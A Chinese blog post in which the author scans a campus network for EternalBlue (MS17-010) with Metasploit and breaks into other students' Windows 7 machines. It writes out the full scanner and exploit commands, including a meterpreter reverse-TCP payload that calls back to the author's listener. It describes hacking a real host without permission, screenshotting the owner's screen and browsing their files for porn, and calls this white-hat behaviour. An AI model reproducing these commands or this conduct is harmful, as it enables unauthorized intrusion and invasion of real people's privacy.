利用ms17_010的永恆之藍在前些日子火爆了一段時間,校園網中也聲稱封鎖了相應端口。最近在搞MSF的深入學習,於是有了下文。
ms17_010掃描工具
msf中的輔助模塊含有一個強大的ms17_010掃描工具:
auxiliary/scanner/smb/smb_ms17_010
使用這個工具可以快速掃描某個網段中含有ms17_010漏洞的主機,該工具的使用也很簡單。
首先確定要掃描的網段,以我學校的校園局域網為例,要掃描的網段為10.31.0.0/16。實際上經過測試,只需掃描10.31.0-128.1-254 就可以了。
具體的命令如下:
use auxiliary/scanner/smb/smb_ms17_010 set rhosts 10.31.0-128.1-254 set threads 512 exploit
掃描的部分結果如下圖所示:
上圖中,左側有綠色加號標記的主機並且被識別出來是Windows 7的主機有很大概率存在該漏洞。如果被識別出是Windows 8 或者 Windows 10的主機,基本上是不能成功的。當嘗試完Windows 7 的后,如果還沒有一台可以入侵的,可以繼續嘗試那些左側是紅色減號並且沒有識別出系統版本的。
好了,目標主機有了,下面就是開始入侵了!
利用ms17_010入侵主機
msf中的exploit模塊中含有ms17_010的利用工具:
exploit/windows/smb/ms17_010_eternalblue
該工具的使用也很簡單,只要設置好目標主要的ip和payload就可以exploit了。
需要注意的是,在使用該exploit入侵主機時,如果一次不能成功,盡量不要嘗試第二次了,這樣很容易把目標主機搞崩潰。
具體的命令如下:
use exploit/windows/smb/ms17_010_eternalblue set rhost 10.31.36.66 set payload windows/x64/meterpreter/reverse_tcp set lhost 10.31.30.49 set lport 4567 exploit
以上命令中的10.31.36.66為目標主機,監聽反連的主機ip為10.31.30.49,也就是自己的主機ip,監聽的端口為4567端口。
不過上面那台主機並沒有成功,下面是另外一台成功入侵的截圖:
可以上面中的10.31.36.103 主機被成功入侵了:)。
然后輸入screenshot截個圖看看主人在干什么吧。
screenshot
好吧,在看LOL比賽 0.0 。
我還是簡單看看機子上有沒動作片好下載,然后上傳個txt提醒他修復漏洞好了。我們都是有操守的白帽子對吧:)。
至此,利用MSF對ms17_010漏洞主機的發現和入侵過程就結束了,通過這些對校園網的掃描,發現還是有大部分主機是存在該漏洞的。。。